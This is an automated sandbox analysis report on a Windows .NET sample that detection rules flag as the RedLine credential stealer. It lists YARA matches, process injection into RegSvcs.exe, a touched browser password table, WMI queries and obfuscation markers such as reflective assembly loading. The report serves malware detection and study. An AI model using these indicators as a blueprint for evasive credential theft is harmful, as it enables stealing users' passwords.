                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                        System Summary

                        barindex
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_006BD3440_2_006BD344
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_049272780_2_04927278
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_049200060_2_04920006
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_049200400_2_04920040
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_0492726A0_2_0492726A
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06ABF2600_2_06ABF260
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB95F00_2_06AB95F0
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB05600_2_06AB0560
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB05500_2_06AB0550
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB91B80_2_06AB91B8
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06ABB1000_2_06ABB100
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB9E600_2_06AB9E60
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB9A280_2_06AB9A28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00CAE7B03_2_00CAE7B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00CADC903_2_00CADC90
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1838242652.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841978376.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1838659193.00000000023F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1838659193.00000000023F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exeBinary or memory string: OriginalFilenameCWHy.exe@ vs MfzXU6tKOq.exe
                        Source: MfzXU6tKOq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: MfzXU6tKOq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, MnoQnNNBEfx1yMu4gx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, MnoQnNNBEfx1yMu4gx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.csSecurity API names: _0020.AddAccessRule
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/44@1/1
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MfzXU6tKOq.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMutant created: \Sessions\1\BaseNamedObjects\ANUmbguURsnpHKUWDittdYvd
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6D47.tmpJump to behavior
                        Source: MfzXU6tKOq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: MfzXU6tKOq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: tmpA7B6.tmp.3.dr, tmpA7A4.tmp.3.dr, tmpA7C7.tmp.3.dr, tmpA7C8.tmp.3.dr, tmpA7C9.tmp.3.dr, tmpA7A5.tmp.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: MfzXU6tKOq.exeReversingLabs: Detection: 68%
                        Source: unknownProcess created: C:\Users\user\Desktop\MfzXU6tKOq.exe "C:\Users\user\Desktop\MfzXU6tKOq.exe"
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: MfzXU6tKOq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: MfzXU6tKOq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: MfzXU6tKOq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: CWHy.pdb source: MfzXU6tKOq.exe
                        Source: Binary string: CWHy.pdbSHA256 source: MfzXU6tKOq.exe

                        Data Obfuscation

                        barindex
                        Source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: MfzXU6tKOq.exe, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.cs.Net Code: nx9RGXH2Sg System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.cs.Net Code: nx9RGXH2Sg System.Reflection.Assembly.Load(byte[])
                        Source: MfzXU6tKOq.exeStatic PE information: 0xDC403931 [Tue Feb 4 11:27:45 2087 UTC]
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_0492F4D7 pushfd ; iretd 0_2_0492F4E6
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06ABC23C push esp; retf 0_2_06ABC23D
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 0_2_06AB8FEB push esp; retf 0_2_06AB8FEC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00CA1861 push cs; retf 3_2_00CA1866
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00CA1867 push cs; retf 3_2_00CA186A
                        Source: MfzXU6tKOq.exeStatic PE information: section name: .text entropy: 7.9180899249634855
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, YvqQQi5LQSEtA1vIFA.csHigh entropy of concatenated method names: 'Dispose', 'XRN8VhAXPc', 'jPAkoC8kjS', 'adpW7sNyUE', 'AXm8HeJAlm', 'VDw8zA1AJO', 'ProcessDialogKey', 'qHyk7XqMOg', 'gSvk8URtcm', 'SGYkkSqyO6'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, FIxVroxvqejdE6OIaG.csHigh entropy of concatenated method names: 'ToString', 'TOnLnwdlrN', 'qsALobJTke', 'p4LLDPp4WS', 'ojJLP0ek5s', 'sa7L2C9Em5', 'vZSLWaORMe', 'f3eLTY4XQa', 'CIcLuqjA69', 'h6dLfCUmIq'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.csHigh entropy of concatenated method names: 'ae8QJDev8s', 'vxcQmesOoG', 'qPlQ5Eylp2', 'zNoQetDyrT', 'lw7QiW5veM', 'qaWQpnrDuZ', 'G4uQ03qEpi', 'GdRQUavqWw', 'ddjQ1TJ7lO', 'RnuQcd35Dl'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, YWKcSAZiNp9h8FCBMb.csHigh entropy of concatenated method names: 'XLxpJno0Wq', 'mHep5jx1gx', 'IUWpiShlhM', 'KFkp0rT9vv', 'GsEpUbIO4p', 'YW4ijUxjfV', 'Fajiy2W4BG', 'skVi36R6dL', 'oMeiBwGIL8', 'q22iVwX6k6'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, UXqMOgV5SvURtcmxGY.csHigh entropy of concatenated method names: 'wU4AZgQwyJ', 'fYfAoSi5g3', 'PxOADIIJFC', 'peZAPob8k7', 'ffHA25lU9D', 'UXLAWm98nV', 'dW0ATsF9As', 'en6AuTAUQL', 'vvXAfZslXg', 'm7JAqKrygv'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, zsFXqfRIeoBPtVyXeV.csHigh entropy of concatenated method names: 'U6f80noQnN', 'XEf8Ux1yMu', 'bZc8cp2W78', 'Ne38EyequW', 'Vxy860tHWK', 'mSA8LiNp9h', 'QFgyXab11Mo7aFDE3e', 'U65xJUywKXPWqcqtGN', 'bYY88SaQkH', 'lI68QToIu7'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, a9NNWnz9bHnXJ9XOJE.csHigh entropy of concatenated method names: 'jdHIan241n', 'zDYIN1QjSd', 'JAjIMflQ6Q', 'bIZIZ1naMc', 'F15Iocs0OE', 'qUDIPQqhTS', 'nUHI27kYgZ', 'U99ICJgLiF', 'hBPI94YxwU', 'YkeIde1PLs'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, hquWfGbN9urpwyxy0t.csHigh entropy of concatenated method names: 'SNLitDm4wN', 'L56ivjSMc2', 'TLFeD0E1ij', 'LLkePRTDf0', 'DERe2cSOex', 'gV8eWfEdWI', 'b5DeTe0auG', 'nsleuUSA9W', 'DT4efLZy7U', 'DCweqQJdtQ'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, LauFip3XiVRNhAXPct.csHigh entropy of concatenated method names: 'EIYA6wqkr2', 'WSiA4gIpfO', 'HCVAAnZdo1', 'riGAFmZQ6U', 'UILAwldDaQ', 'RDPACM4WpZ', 'Dispose', 'uaCsmmoqn6', 'u98s5ov159', 'FiMsePQ2A6'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, ep76eoyyPk7bM5DK2l.csHigh entropy of concatenated method names: 'eT64BUWyGe', 'MPt4HupBNT', 'vgGs7DDOnr', 'yvTs8DYGIp', 'iUc4n4SbfV', 'QwH4gjK7st', 'MtL4XU8b5u', 'THB4So4MPX', 'd4a4YBx8bF', 'cxi4xkImLw'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, psvohwT95GnjjCxgtU.csHigh entropy of concatenated method names: 'qk00mdB5FI', 'UG80eORo7P', 'n4K0pfn23l', 'fhMpHI9nt1', 'anRpzBXWje', 'rSN073SqhG', 'pYU08HNfos', 'EMM0kr9arG', 'tbo0Q1TAmZ', 'XfT0REWDLN'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, cZuCu9XLKotE53aNYP.csHigh entropy of concatenated method names: 'h5nONWlhAc', 'lDMOMJD1sO', 'IRXOZWine3', 'J7NOoJb4Ki', 'K6FOP6HCYt', 'fKUO2s7oLp', 'zgwOTBLDSB', 'QyNOuy4aF0', 'DZ6OqykZfG', 'rx7OnWv3Ic'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, FLJvcTelaVsqNXHfyM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uplkVg9BGj', 'IeDkHvKOpB', 'r4SkzaBfBe', 'uCPQ7vuSq3', 'YYjQ8CogKN', 'zpvQkDvLvX', 'iupQQLhGGJ', 'p6iNCHPJBfBp9V89LBH'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, KPu0gLftgAq1NdILl0.csHigh entropy of concatenated method names: 'QGe09BhMNb', 'CHW0dl9KZ3', 'n3F0G0vACD', 'SY90KebOTR', 'rQc0tLritE', 'Cvj0aMxUXr', 'Upf0vuKH4M', 'HWV0NA9ngY', 'q4K0MOlvHJ', 'b5K0bILTXZ'
                        Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, suxMDplAaBQEMHhMt8.csHigh entropy of concatenated method names: 'YEl4cQckth', 'nPX4EJuJ1I', 'ToString', 'ber4m9aWk8', 'vfZ45CTaCV', 'Sqs4eWUybZ', 'ImJ4i3hHy1', 'Pgj4pQyILi', 'fwo40tB2Bf', 'd3h4UciS3t'
